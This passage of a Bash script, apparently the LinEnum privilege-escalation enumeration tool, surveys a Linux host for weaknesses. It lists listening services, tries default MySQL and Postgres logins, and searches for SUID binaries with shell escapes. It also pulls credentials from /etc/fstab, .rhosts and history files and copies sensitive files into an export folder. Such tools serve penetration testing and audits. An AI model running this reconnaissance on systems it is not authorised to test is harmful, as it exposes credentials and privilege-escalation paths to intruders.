"\n" |tee -a $report 2>/dev/null 505 | else 506 | : 507 | fi 508 | 509 | #default route configuration 510 | defroute=`route 2>/dev/null | grep default` 511 | if [ "$defroute" ]; then 512 | echo -e "\e[00;31mDefault route:\e[00m\n$defroute" |tee -a $report 2>/dev/null 513 | echo -e "\n" |tee -a $report 2>/dev/null 514 | else 515 | : 516 | fi 517 | 518 | #listening TCP 519 | tcpservs=`netstat -antp 2>/dev/null` 520 | if [ "$tcpservs" ]; then 521 | echo -e "\e[00;31mListening TCP:\e[00m\n$tcpservs" |tee -a $report 2>/dev/null 522 | echo -e "\n" |tee -a $report 2>/dev/null 523 | else 524 | : 525 | fi 526 | 527 | #listening UDP 528 | udpservs=`netstat -anup 2>/dev/null` 529 | if [ "$udpservs" ]; then 530 | echo -e "\e[00;31mListening UDP:\e[00m\n$udpservs" |tee -a $report 2>/dev/null 531 | echo -e "\n" |tee -a $report 2>/dev/null 532 | else 533 | : 534 | fi 535 | 536 | echo -e "\e[00;33m### SERVICES #############################################\e[00m" |tee -a $report 2>/dev/null 537 | 538 | #running processes 539 | psaux=`ps aux 2>/dev/null` 540 | if [ "$psaux" ]; then 541 | echo -e "\e[00;31mRunning processes:\e[00m\n$psaux" |tee -a $report 2>/dev/null 542 | echo -e "\n" |tee -a $report 2>/dev/null 543 | else 544 | : 545 | fi 546 | 547 | #lookup process binary path and permissisons 548 | procperm=`ps aux 2>/dev/null | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null` 549 | if [ "$procperm" ]; then 550 | echo -e "\e[00;31mProcess binaries & associated permissions (from above list):\e[00m\n$procperm" |tee -a $report 2>/dev/null 551 | echo -e "\n" |tee -a $report 2>/dev/null 552 | else 553 | : 554 | fi 555 | 556 | if [ "$export" ] && [ "$procperm" ]; then 557 | procpermbase=`ps aux 2>/dev/null | awk '{print $11}' | xargs -r ls 2>/dev/null | awk '!x[$0]++' 2>/dev/null` 558 | mkdir $format/ps-export/ 2>/dev/null 559 | for i in $procpermbase; do cp --parents $i $format/ps-export/; done 2>/dev/null 560 | else 561 | : 562 | fi 563 | 564 | #anything 'useful' in inetd.conf 565 | inetdread=`cat /etc/inetd.conf 2>/dev/null` 566 | if [ "$inetdread" ]; then 567 | echo -e "\e[00;31mContents of /etc/inetd.conf:\e[00m\n$inetdread" |tee -a $report 2>/dev/null 568 | echo -e "\n" |tee -a $report 2>/dev/null 569 | else 570 | : 571 | fi 572 | 573 | if [ "$export" ] && [ "$inetdread" ]; then 574 | mkdir $format/etc-export/ 2>/dev/null 575 | cp /etc/inetd.conf $format/etc-export/inetd.conf 2>/dev/null 576 | else 577 | : 578 | fi 579 | 580 | #very 'rough' command to extract associated binaries from inetd.conf & show permisisons of each 581 | inetdbinperms=`cat /etc/inetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null` 582 | if [ "$inetdbinperms" ]; then 583 | echo -e "\e[00;31mThe related inetd binary permissions:\e[00m\n$inetdbinperms" |tee -a $report 2>/dev/null 584 | echo -e "\n" |tee -a $report 2>/dev/null 585 | else 586 | : 587 | fi 588 | 589 | xinetdread=`cat /etc/xinetd.conf 2>/dev/null` 590 | if [ "$xinetdread" ]; then 591 | echo -e "\e[00;31mContents of /etc/xinetd.conf:\e[00m\n$xinetdread" |tee -a $report 2>/dev/null 592 | echo -e "\n" |tee -a $report 2>/dev/null 593 | else 594 | : 595 | fi 596 | 597 | if [ "$export" ] && [ "$xinetdread" ]; then 598 | mkdir $format/etc-export/ 2>/dev/null 599 | cp /etc/xinetd.conf $format/etc-export/xinetd.conf 2>/dev/null 600 | else 601 | : 602 | fi 603 | 604 | xinetdincd=`cat /etc/xinetd.conf 2>/dev/null |grep "/etc/xinetd.d" 2>/dev/null` 605 | if [ "$xinetdincd" ]; then 606 | echo -e "\e[00;31m/etc/xinetd.d is included in /etc/xinetd.conf - associated binary permissions are listed below:\e[00m" ls -la /etc/xinetd.d 2>/dev/null |tee -a $report 2>/dev/null 607 | echo -e "\n" |tee -a $report 2>/dev/null 608 | else 609 | : 610 | fi 611 | 612 | #very 'rough' command to extract associated binaries from xinetd.conf & show permisisons of each 613 | xinetdbinperms=`cat /etc/xinetd.conf 2>/dev/null | awk '{print $7}' |xargs -r ls -la 2>/dev/null` 614 | if [ "$xinetdbinperms" ]; then 615 | echo -e "\e[00;31mThe related xinetd binary permissions:\e[00m\n$xinetdbinperms" |tee -a $report 2>/dev/null 616 | echo -e "\n" |tee -a $report 2>/dev/null 617 | else 618 | : 619 | fi 620 | 621 | initdread=`ls -la /etc/init.d 2>/dev/null` 622 | if [ "$initdread" ]; then 623 | echo -e "\e[00;31m/etc/init.d/ binary permissions:\e[00m\n$initdread" |tee -a $report 2>/dev/null 624 | echo -e "\n" |tee -a $report 2>/dev/null 625 | else 626 | : 627 | fi 628 | 629 | #init.d files NOT belonging to root! 630 | initdperms=`find /etc/init.d/ \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null` 631 | if [ "$initdperms" ]; then 632 | echo -e "\e[00;31m/etc/init.d/ files not belonging to root (uid 0):\e[00m\n$initdperms" |tee -a $report 2>/dev/null 633 | echo -e "\n" |tee -a $report 2>/dev/null 634 | else 635 | : 636 | fi 637 | 638 | rcdread=`ls -la /etc/rc.d/init.d 2>/dev/null` 639 | if [ "$rcdread" ]; then 640 | echo -e "\e[00;31m/etc/rc.d/init.d binary permissions:\e[00m\n$rcdread" |tee -a $report 2>/dev/null 641 | echo -e "\n" |tee -a $report 2>/dev/null 642 | else 643 | : 644 | fi 645 | 646 | #init.d files NOT belonging to root! 647 | rcdperms=`find /etc/rc.d/init.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null` 648 | if [ "$rcdperms" ]; then 649 | echo -e "\e[00;31m/etc/rc.d/init.d files not belonging to root (uid 0):\e[00m\n$rcdperms" |tee -a $report 2>/dev/null 650 | echo -e "\n" |tee -a $report 2>/dev/null 651 | else 652 | : 653 | fi 654 | 655 | usrrcdread=`ls -la /usr/local/etc/rc.d 2>/dev/null` 656 | if [ "$usrrcdread" ]; then 657 | echo -e "\e[00;31m/usr/local/etc/rc.d binary permissions:\e[00m\n$usrrcdread" |tee -a $report 2>/dev/null 658 | echo -e "\n" |tee -a $report 2>/dev/null 659 | else 660 | : 661 | fi 662 | 663 | #rc.d files NOT belonging to root! 664 | usrrcdperms=`find /usr/local/etc/rc.d \! -uid 0 -type f 2>/dev/null |xargs -r ls -la 2>/dev/null` 665 | if [ "$usrrcdperms" ]; then 666 | echo -e "\e[00;31m/usr/local/etc/rc.d files not belonging to root (uid 0):\e[00m\n$usrrcdperms" |tee -a $report 2>/dev/null 667 | echo -e "\n" |tee -a $report 2>/dev/null 668 | else 669 | : 670 | fi 671 | 672 | echo -e "\e[00;33m### SOFTWARE #############################################\e[00m" |tee -a $report 2>/dev/null 673 | 674 | #sudo version - check to see if there are any known vulnerabilities with this 675 | sudover=`sudo -V 2>/dev/null| grep "Sudo version" 2>/dev/null` 676 | if [ "$sudover" ]; then 677 | echo -e "\e[00;31mSudo version:\e[00m\n$sudover" |tee -a $report 2>/dev/null 678 | echo -e "\n" |tee -a $report 2>/dev/null 679 | else 680 | : 681 | fi 682 | 683 | #mysql details - if installed 684 | mysqlver=`mysql --version 2>/dev/null` 685 | if [ "$mysqlver" ]; then 686 | echo -e "\e[00;31mMYSQL version:\e[00m\n$mysqlver" |tee -a $report 2>/dev/null 687 | echo -e "\n" |tee -a $report 2>/dev/null 688 | else 689 | : 690 | fi 691 | 692 | #checks to see if root/root will get us a connection 693 | mysqlconnect=`mysqladmin -uroot -proot version 2>/dev/null` 694 | if [ "$mysqlconnect" ]; then 695 | echo -e "\e[00;33m***We can connect to the local MYSQL service with default root/root credentials!\e[00m\n$mysqlconnect" |tee -a $report 2>/dev/null 696 | echo -e "\n" |tee -a $report 2>/dev/null 697 | else 698 | : 699 | fi 700 | 701 | #mysql version details 702 | mysqlconnectnopass=`mysqladmin -uroot version 2>/dev/null` 703 | if [ "$mysqlconnectnopass" ]; then 704 | echo -e "\e[00;33m***We can connect to the local MYSQL service as 'root' and without a password!\e[00m\n$mysqlconnectnopass" |tee -a $report 2>/dev/null 705 | echo -e "\n" |tee -a $report 2>/dev/null 706 | else 707 | : 708 | fi 709 | 710 | #postgres details - if installed 711 | postgver=`psql -V 2>/dev/null` 712 | if [ "$postgver" ]; then 713 | echo -e "\e[00;31mPostgres version:\e[00m\n$postgver" |tee -a $report 2>/dev/null 714 | echo -e "\n" |tee -a $report 2>/dev/null 715 | else 716 | : 717 | fi 718 | 719 | #checks to see if any postgres password exists and connects to DB 'template0' - following commands are a variant on this 720 | postcon1=`psql -U postgres template0 -c 'select version()' 2>/dev/null | grep version` 721 | if [ "$postcon1" ]; then 722 | echo -e "\e[00;33m***We can connect to Postgres DB 'template0' as user 'postgres' with no password!:\e[00m\n$postcon1" |tee -a $report 2>/dev/null 723 | echo -e "\n" |tee -a $report 2>/dev/null 724 | else 725 | : 726 | fi 727 | 728 | postcon11=`psql -U postgres template1 -c 'select version()' 2>/dev/null | grep version` 729 | if [ "$postcon11" ]; then 730 | echo -e "\e[00;33m***We can connect to Postgres DB 'template1' as user 'postgres' with no password!:\e[00m\n$postcon11" |tee -a $report 2>/dev/null 731 | echo -e "\n" |tee -a $report 2>/dev/null 732 | else 733 | : 734 | fi 735 | 736 | postcon2=`psql -U pgsql template0 -c 'select version()' 2>/dev/null | grep version` 737 | if [ "$postcon2" ]; then 738 | echo -e "\e[00;33m***We can connect to Postgres DB 'template0' as user 'psql' with no password!:\e[00m\n$postcon2" |tee -a $report 2>/dev/null 739 | echo -e "\n" |tee -a $report 2>/dev/null 740 | else 741 | : 742 | fi 743 | 744 | postcon22=`psql -U pgsql template1 -c 'select version()' 2>/dev/null | grep version` 745 | if [ "$postcon22" ]; then 746 | echo -e "\e[00;33m***We can connect to Postgres DB 'template1' as user 'psql' with no password!:\e[00m\n$postcon22" |tee -a $report 2>/dev/null 747 | echo -e "\n" |tee -a $report 2>/dev/null 748 | else 749 | : 750 | fi 751 | 752 | #apache details - if installed 753 | apachever=`apache2 -v 2>/dev/null; httpd -v 2>/dev/null` 754 | if [ "$apachever" ]; then 755 | echo -e "\e[00;31mApache version:\e[00m\n$apachever" |tee -a $report 2>/dev/null 756 | echo -e "\n" |tee -a $report 2>/dev/null 757 | else 758 | : 759 | fi 760 | 761 | #what account is apache running under 762 | apacheusr=`cat /etc/apache2/envvars 2>/dev/null |grep -i 'user\|group' 2>/dev/null |awk '{sub(/.*\export /,"")}1' 2>/dev/null` 763 | if [ "$apacheusr" ]; then 764 | echo -e "\e[00;31mApache user configuration:\e[00m\n$apacheusr" |tee -a $report 2>/dev/null 765 | echo -e "\n" |tee -a $report 2>/dev/null 766 | else 767 | : 768 | fi 769 | 770 | if [ "$export" ] && [ "$apacheusr" ]; then 771 | mkdir --parents $format/etc-export/apache2/ 2>/dev/null 772 | cp /etc/apache2/envvars $format/etc-export/apache2/envvars 2>/dev/null 773 | else 774 | : 775 | fi 776 | 777 | #installed apache modules 778 | apachemodules=`apache2ctl -M 2>/dev/null; httpd -M 2>/dev/null` 779 | if [ "$apachemodules" ]; then 780 | echo -e "\e[00;31mInstalled Apache modules:\e[00m\n$apachemodules" |tee -a $report 2>/dev/null 781 | echo -e "\n" |tee -a $report 2>/dev/null 782 | else 783 | : 784 | fi 785 | 786 | #anything in the default http home dirs 787 | apachehomedirs=`ls -alhR /var/www/ 2>/dev/null; ls -alhR /srv/www/htdocs/ 2>/dev/null; ls -alhR /usr/local/www/apache2/data/ 2>/dev/null; ls -alhR /opt/lampp/htdocs/ 2>/dev/null` 788 | if [ "$apachehomedirs" ]; then 789 | echo -e "\e[00;31mAnything in the Apache home dirs?:\e[00m\n$apachehomedirs" |tee -a $report 2>/dev/null 790 | echo -e "\n" |tee -a $report 2>/dev/null 791 | else 792 | : 793 | fi 794 | 795 | echo -e "\e[00;33m### INTERESTING FILES ####################################\e[00m" |tee -a $report 2>/dev/null 796 | 797 | #checks to see if various files are installed 798 | echo -e "\e[00;31mUseful file locations:\e[00m" |tee -a $report 2>/dev/null; which nc 2>/dev/null |tee -a $report 2>/dev/null; which netcat 2>/dev/null |tee -a $report 2>/dev/null; which wget 2>/dev/null |tee -a $report 2>/dev/null; which nmap 2>/dev/null |tee -a $report 2>/dev/null; which gcc 2>/dev/null |tee -a $report 2>/dev/null 799 | echo -e "\n" |tee -a $report 2>/dev/null 800 | 801 | #limited search for installed compilers 802 | compiler=`dpkg --list 2>/dev/null| grep compiler |grep -v decompiler 2>/dev/null && yum list installed 'gcc*' 2>/dev/null| grep gcc 2>/dev/null` 803 | if [ "$compiler" ]; then 804 | echo -e "\e[00;31mInstalled compilers:\e[00m\n$compiler" |tee -a $report 2>/dev/null 805 | echo -e "\n" |tee -a $report 2>/dev/null 806 | else 807 | : 808 | fi 809 | 810 | #manual check - lists out sensitive files, can we read/modify etc. 811 | echo -e "\e[00;31mCan we read/write sensitive files:\e[00m" |tee -a $report 2>/dev/null; ls -la /etc/passwd 2>/dev/null |tee -a $report 2>/dev/null; ls -la /etc/group 2>/dev/null |tee -a $report 2>/dev/null; ls -la /etc/profile 2>/dev/null; ls -la /etc/shadow 2>/dev/null |tee -a $report 2>/dev/null; ls -la /etc/master.passwd 2>/dev/null |tee -a $report 2>/dev/null 812 | echo -e "\n" |tee -a $report 2>/dev/null 813 | 814 | #search for suid files - this can take some time so is only 'activated' with thorough scanning switch (as are all suid scans below) 815 | if [ "$thorough" = "1" ]; then 816 | findsuid=`find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;` 817 | if [ "$findsuid" ]; then 818 | echo -e "\e[00;31mSUID files:\e[00m\n$findsuid" |tee -a $report 2>/dev/null 819 | echo -e "\n" |tee -a $report 2>/dev/null 820 | else 821 | : 822 | fi 823 | else 824 | : 825 | fi 826 | 827 | if [ "$thorough" = "1" ]; then 828 | if [ "$export" ] && [ "$findsuid" ]; then 829 | mkdir $format/suid-files/ 2>/dev/null 830 | for i in $findsuid; do cp $i $format/suid-files/; done 2>/dev/null 831 | else 832 | : 833 | fi 834 | else 835 | : 836 | fi 837 | 838 | #list of 'interesting' suid files - feel free to make additions 839 | if [ "$thorough" = "1" ]; then 840 | intsuid=`find / -perm -4000 -type f 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\|'more'\|'less'\|'vi'\|'vim'\|'emacs'\|'nc'\|'netcat'\|python\|ruby\|lua\|irb\|pl' | xargs -r ls -la 2>/dev/null` 841 | if [ "$intsuid" ]; then 842 | echo -e "\e[00;33m***Possibly interesting SUID files:\e[00m\n$intsuid" |tee -a $report 2>/dev/null 843 | echo -e "\n" |tee -a $report 2>/dev/null 844 | else 845 | : 846 | fi 847 | else 848 | : 849 | fi 850 | 851 | #lists word-writable suid files 852 | if [ "$thorough" = "1" ]; then 853 | wwsuid=`find / -perm -4007 -type f -exec ls -la {} 2>/dev/null \;` 854 | if [ "$wwsuid" ]; then 855 | echo -e "\e[00;31mWorld-writable SUID files:\e[00m\n$wwsuid" |tee -a $report 2>/dev/null 856 | echo -e "\n" |tee -a $report 2>/dev/null 857 | else 858 | : 859 | fi 860 | else 861 | : 862 | fi 863 | 864 | #lists world-writable suid files owned by root 865 | if [ "$thorough" = "1" ]; then 866 | wwsuidrt=`find / -uid 0 -perm -4007 -type f -exec ls -la {} 2>/dev/null \;` 867 | if [ "$wwsuidrt" ]; then 868 | echo -e "\e[00;31mWorld-writable SUID files owned by root:\e[00m\n$wwsuidrt" |tee -a $report 2>/dev/null 869 | echo -e "\n" |tee -a $report 2>/dev/null 870 | else 871 | : 872 | fi 873 | else 874 | : 875 | fi 876 | 877 | #search for guid files - this can take some time so is only 'activated' with thorough scanning switch (as are all guid scans below) 878 | if [ "$thorough" = "1" ]; then 879 | findguid=`find / -perm -2000 -type f -exec ls -la {} 2>/dev/null \;` 880 | if [ "$findguid" ]; then 881 | echo -e "\e[00;31mGUID files:\e[00m\n$findguid" |tee -a $report 2>/dev/null 882 | echo -e "\n" |tee -a $report 2>/dev/null 883 | else 884 | : 885 | fi 886 | else 887 | : 888 | fi 889 | 890 | if [ "$thorough" = "1" ]; then 891 | if [ "$export" ] && [ "$findguid" ]; then 892 | mkdir $format/guid-files/ 2>/dev/null 893 | for i in $findguid; do cp $i $format/guid-files/; done 2>/dev/null 894 | else 895 | : 896 | fi 897 | else 898 | : 899 | fi 900 | 901 | #list of 'interesting' guid files - feel free to make additions 902 | if [ "$thorough" = "1" ]; then 903 | intguid=`find / -perm -2000 -type f 2>/dev/null | grep -w 'nmap\|perl\|'awk'\|'find'\|'bash'\|'sh'\|'man'\|'more'\|'less'\|'vi'\|'emacs'\|'vim'\|'nc'\|'netcat'\|python\|ruby\|lua\|irb\|pl' | xargs -r ls -la 2>/dev/null` 904 | if [ "$intguid" ]; then 905 | echo -e "\e[00;33m***Possibly interesting GUID files:\e[00m\n$intguid" |tee -a $report 2>/dev/null 906 | echo -e "\n" |tee -a $report 2>/dev/null 907 | else 908 | : 909 | fi 910 | else 911 | : 912 | fi 913 | 914 | #lists world-writable guid files 915 | if [ "$thorough" = "1" ]; then 916 | wwguid=`find / -perm -2007 -type f -exec ls -la {} 2>/dev/null \;` 917 | if [ "$wwguid" ]; then 918 | echo -e "\e[00;31mWorld-writable GUID files:\e[00m\n$wwguid" |tee -a $report 2>/dev/null 919 | echo -e "\n" |tee -a $report 2>/dev/null 920 | else 921 | : 922 | fi 923 | else 924 | : 925 | fi 926 | 927 | #lists world-writable guid files owned by root 928 | if [ "$thorough" = "1" ]; then 929 | wwguidrt=`find / -uid 0 -perm -2007 -type f -exec ls -la {} 2>/dev/null \;` 930 | if [ "$wwguidrt" ]; then 931 | echo -e "\e[00;31mAWorld-writable GUID files owned by root:\e[00m\n$wwguidrt" |tee -a $report 2>/dev/null 932 | echo -e "\n" |tee -a $report 2>/dev/null 933 | else 934 | : 935 | fi 936 | else 937 | : 938 | fi 939 | 940 | #list all world-writable files excluding /proc 941 | if [ "$thorough" = "1" ]; then 942 | wwfiles=`find / ! -path "*/proc/*" -perm -2 -type f -exec ls -la {} 2>/dev/null \;` 943 | if [ "$wwfiles" ]; then 944 | echo -e "\e[00;31mWorld-writable files (excluding /proc):\e[00m\n$wwfiles" |tee -a $report 2>/dev/null 945 | echo -e "\n" |tee -a $report 2>/dev/null 946 | else 947 | : 948 | fi 949 | else 950 | : 951 | fi 952 | 953 | if [ "$thorough" = "1" ]; then 954 | if [ "$export" ] && [ "$wwfiles" ]; then 955 | mkdir $format/ww-files/ 2>/dev/null 956 | for i in $wwfiles; do cp --parents $i $format/ww-files/; done 2>/dev/null 957 | else 958 | : 959 | fi 960 | else 961 | : 962 | fi 963 | 964 | #are any .plan files accessible in /home (could contain useful information) 965 | usrplan=`find /home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;` 966 | if [ "$usrplan" ]; then 967 | echo -e "\e[00;31mPlan file permissions and contents:\e[00m\n$usrplan" |tee -a $report 2>/dev/null 968 | echo -e "\n" |tee -a $report 2>/dev/null 969 | else 970 | : 971 | fi 972 | 973 | if [ "$export" ] && [ "$usrplan" ]; then 974 | mkdir $format/plan_files/ 2>/dev/null 975 | for i in $usrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null 976 | else 977 | : 978 | fi 979 | 980 | bsdusrplan=`find /usr/home -iname *.plan -exec ls -la {} \; -exec cat {} 2>/dev/null \;` 981 | if [ "$bsdusrplan" ]; then 982 | echo -e "\e[00;31mPlan file permissions and contents:\e[00m\n$bsdusrplan" |tee -a $report 2>/dev/null 983 | echo -e "\n" |tee -a $report 2>/dev/null 984 | else 985 | : 986 | fi 987 | 988 | if [ "$export" ] && [ "$bsdusrplan" ]; then 989 | mkdir $format/plan_files/ 2>/dev/null 990 | for i in $bsdusrplan; do cp --parents $i $format/plan_files/; done 2>/dev/null 991 | else 992 | : 993 | fi 994 | 995 | #are there any .rhosts files accessible - these may allow us to login as another user etc. 996 | rhostsusr=`find /home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;` 997 | if [ "$rhostsusr" ]; then 998 | echo -e "\e[00;31mrhost config file(s) and file contents:\e[00m\n$rhostsusr" |tee -a $report 2>/dev/null 999 | echo -e "\n" |tee -a $report 2>/dev/null 1000 | else 1001 | : 1002 | fi 1003 | 1004 | if [ "$export" ] && [ "$rhostsusr" ]; then 1005 | mkdir $format/rhosts/ 2>/dev/null 1006 | for i in $rhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null 1007 | else 1008 | : 1009 | fi 1010 | 1011 | bsdrhostsusr=`find /usr/home -iname *.rhosts -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;` 1012 | if [ "$bsdrhostsusr" ]; then 1013 | echo -e "\e[00;31mrhost config file(s) and file contents:\e[00m\n$bsdrhostsusr" |tee -a $report 2>/dev/null 1014 | echo -e "\n" |tee -a $report 2>/dev/null 1015 | else 1016 | : 1017 | fi 1018 | 1019 | if [ "$export" ] && [ "$bsdrhostsusr" ]; then 1020 | mkdir $format/rhosts 2>/dev/null 1021 | for i in $bsdrhostsusr; do cp --parents $i $format/rhosts/; done 2>/dev/null 1022 | else 1023 | : 1024 | fi 1025 | 1026 | rhostssys=`find /etc -iname hosts.equiv -exec ls -la {} 2>/dev/null \; -exec cat {} 2>/dev/null \;` 1027 | if [ "$rhostssys" ]; then 1028 | echo -e "\e[00;31mHosts.equiv file details and file contents: \e[00m\n$rhostssys" |tee -a $report 2>/dev/null 1029 | echo -e "\n" |tee -a $report 2>/dev/null 1030 | else 1031 | : 1032 | fi 1033 | 1034 | if [ "$export" ] && [ "$rhostssys" ]; then 1035 | mkdir $format/rhosts/ 2>/dev/null 1036 | for i in $rhostssys; do cp --parents $i $format/rhosts/; done 2>/dev/null 1037 | else 1038 | : 1039 | fi 1040 | 1041 | #list nfs shares/permisisons etc. 1042 | nfsexports=`ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null` 1043 | if [ "$nfsexports" ]; then 1044 | echo -e "\e[00;31mNFS config details: \e[00m\n$nfsexports" |tee -a $report 2>/dev/null 1045 | echo -e "\n" |tee -a $report 2>/dev/null 1046 | else 1047 | : 1048 | fi 1049 | 1050 | if [ "$export" ] && [ "$nfsexports" ]; then 1051 | mkdir $format/etc-export/ 2>/dev/null 1052 | cp /etc/exports $format/etc-export/exports 2>/dev/null 1053 | else 1054 | : 1055 | fi 1056 | 1057 | #looking for credentials in /etc/fstab 1058 | fstab=`cat /etc/fstab 2>/dev/null |grep username |awk '{sub(/.*\username=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo username: 2>/dev/null; cat /etc/fstab 2>/dev/null |grep password |awk '{sub(/.*\password=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo password: 2>/dev/null; cat /etc/fstab 2>/dev/null |grep domain |awk '{sub(/.*\domain=/,"");sub(/\,.*/,"")}1' 2>/dev/null| xargs -r echo domain: 2>/dev/null` 1059 | if [ "$fstab" ]; then 1060 | echo -e "\e[00;33m***Looks like there are credentials in /etc/fstab!\e[00m\n$fstab" |tee -a $report 2>/dev/null 1061 | echo -e "\n" |tee -a $report 2>/dev/null 1062 | else 1063 | : 1064 | fi 1065 | 1066 | if [ "$export" ] && [ "$fstab" ]; then 1067 | mkdir $format/etc-exports/ 2>/dev/null 1068 | cp /etc/fstab $format/etc-exports/fstab done 2>/dev/null 1069 | else 1070 | : 1071 | fi 1072 | 1073 | fstabcred=`cat /etc/fstab 2>/dev/null |grep cred |awk '{sub(/.*\credentials=/,"");sub(/\,.*/,"")}1' 2>/dev/null | xargs -I{} sh -c 'ls -la {}; cat {}' 2>/dev/null` 1074 | if [ "$fstabcred" ]; then 1075 | echo -e "\e[00;33m***/etc/fstab contains a credentials file!\e[00m\n$fstabcred" |tee -a $report 2>/dev/null 1076 | echo -e "\n" |tee -a $report 2>/dev/null 1077 | else 1078 | : 1079 | fi 1080 | 1081 | if [ "$export" ] && [ "$fstabcred" ]; then 1082 | mkdir $format/etc-exports/ 2>/dev/null 1083 | cp /etc/fstab $format/etc-exports/fstab done 2>/dev/null 1084 | else 1085 | : 1086 | fi 1087 | 1088 | #use supplied keyword and cat *.conf files for potential matches - output will show line number within relevant file path where a match has been located 1089 | if [ "$keyword" = "" ]; then 1090 | echo -e "Can't search *.conf files as no keyword was entered\n" |tee -a $report 2>/dev/null 1091 | else 1092 | confkey=`find / -maxdepth 4 -name *.conf -type f -exec grep -Hn $keyword {} \; 2>/dev/null` 1093 | if [ "$confkey" ]; then 1094 | echo -e "\e[00;31mFind keyword ($keyword) in .conf files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$confkey" |tee -a $report 2>/dev/null 1095 | echo -e "\n" |tee -a $report 2>/dev/null 1096 | else 1097 | echo -e "\e[00;31mFind keyword ($keyword) in .conf files (recursive 4 levels):\e[00m" |tee -a $report 2>/dev/null 1098 | echo -e "'$keyword' not found in any .conf files" |tee -a $report 2>/dev/null 1099 | echo -e "\n" |tee -a $report 2>/dev/null 1100 | fi 1101 | fi 1102 | 1103 | if [ "$keyword" = "" ]; then 1104 | : 1105 | else 1106 | if [ "$export" ] && [ "$confkey" ]; then 1107 | confkeyfile=`find / -maxdepth 4 -name *.conf -type f -exec grep -lHn $keyword {} \; 2>/dev/null` 1108 | mkdir --parents $format/keyword_file_matches/config_files/ 2>/dev/null 1109 | for i in $confkeyfile; do cp --parents $i $format/keyword_file_matches/config_files/ ; done 2>/dev/null 1110 | else 1111 | : 1112 | fi 1113 | fi 1114 | 1115 | #use supplied keyword and cat *.log files for potential matches - output will show line number within relevant file path where a match has been located 1116 | if [ "$keyword" = "" ];then 1117 | echo -e "Can't search *.log files as no keyword was entered\n" |tee -a $report 2>/dev/null 1118 | else 1119 | logkey=`find / -name *.log -type f -exec grep -Hn $keyword {} \; 2>/dev/null` 1120 | if [ "$logkey" ]; then 1121 | echo -e "\e[00;31mFind keyword ($keyword) in .log files (output format filepath:identified line number where keyword appears):\e[00m\n$logkey" |tee -a $report 2>/dev/null 1122 | echo -e "\n" |tee -a $report 2>/dev/null 1123 | else 1124 | echo -e "\e[00;31mFind keyword ($keyword) in .log files (recursive 2 levels):\e[00m" |tee -a $report 2>/dev/null 1125 | echo -e "'$keyword' not found in any .log files" 1126 | echo -e "\n" |tee -a $report 2>/dev/null 1127 | fi 1128 | fi 1129 | 1130 | if [ "$keyword" = "" ];then 1131 | : 1132 | else 1133 | if [ "$export" ] && [ "$logkey" ]; then 1134 | logkeyfile=`find / -name *.log -type f -exec grep -lHn $keyword {} \; 2>/dev/null` 1135 | mkdir --parents $format/keyword_file_matches/log_files/ 2>/dev/null 1136 | for i in $logkeyfile; do cp --parents $i $format/keyword_file_matches/log_files/ ; done 2>/dev/null 1137 | else 1138 | : 1139 | fi 1140 | fi 1141 | 1142 | #use supplied keyword and cat *.ini files for potential matches - output will show line number within relevant file path where a match has been located 1143 | if [ "$keyword" = "" ];then 1144 | echo -e "Can't search *.ini files as no keyword was entered\n" |tee -a $report 2>/dev/null 1145 | else 1146 | inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -Hn $keyword {} \; 2>/dev/null` 1147 | if [ "$inikey" ]; then 1148 | echo -e "\e[00;31mFind keyword ($keyword) in .ini files (recursive 4 levels - output format filepath:identified line number where keyword appears):\e[00m\n$inikey" |tee -a $report 2>/dev/null 1149 | echo -e "\n" |tee -a $report 2>/dev/null 1150 | else 1151 | echo -e "\e[00;31mFind keyword ($keyword) in .ini files (recursive 2 levels):\e[00m" |tee -a $report 2>/dev/null 1152 | echo -e "'$keyword' not found in any .ini files" |tee -a $report 2>/dev/null 1153 | echo -e "\n" 1154 | fi 1155 | fi 1156 | 1157 | if [ "$keyword" = "" ];then 1158 | : 1159 | else 1160 | if [ "$export" ] && [ "$inikey" ]; then 1161 | inikey=`find / -maxdepth 4 -name *.ini -type f -exec grep -lHn $keyword {} \; 2>/dev/null` 1162 | mkdir --parents $format/keyword_file_matches/ini_files/ 2>/dev/null 1163 | for i in $inikey; do cp --parents $i $format/keyword_file_matches/ini_files/ ; done 2>/dev/null 1164 | else 1165 | : 1166 | fi 1167 | fi 1168 | 1169 | #quick extract of .conf files from /etc - only 1 level 1170 | allconf=`find /etc/ -maxdepth 1 -name *.conf -type f -exec ls -la {} \; 2>/dev/null` 1171 | if [ "$allconf" ]; then 1172 | echo -e "\e[00;31mAll *.conf files in /etc (recursive 1 level):\e[00m\n$allconf" |tee -a $report 2>/dev/null 1173 | echo -e "\n" |tee -a $report 2>/dev/null 1174 | else 1175 | : 1176 | fi 1177 | 1178 | if [ "$export" ] && [ "$allconf" ]; then 1179 | mkdir $format/conf-files/ 2>/dev/null 1180 | for i in $allconf; do cp --parents $i $format/conf-files/; done 2>/dev/null 1181 | else 1182 | : 1183 | fi 1184 | 1185 | #extract any user history files that are accessible 1186 | usrhist=`ls -la ~/.*_history 2>/dev/null` 1187 | if [ "$usrhist" ]; then 1188 | echo -e "\e[00;31mCurrent user's history files:\e[00m\n$usrhist" |tee -a $report 2>/dev/null 1189 | echo -e "\n" |tee -a $report 2>/dev/null 1190 | else 1191 | : 1192 | fi 1193 | 1194 | if [ "$export" ] && [ "$usrhist" ]; then 1195 | mkdir $format/history_files/ 2>/dev/null 1196 | for i in $usrhist; do cp --parents $i $format/history_files/; done 2>/dev/null 1197 | else 1198 | : 1199 | fi 1200 | 1201 | #can we read roots *_history files - could be passwords stored etc. 1202 | roothist=`ls -la /root/.*_history 2>/dev/null` 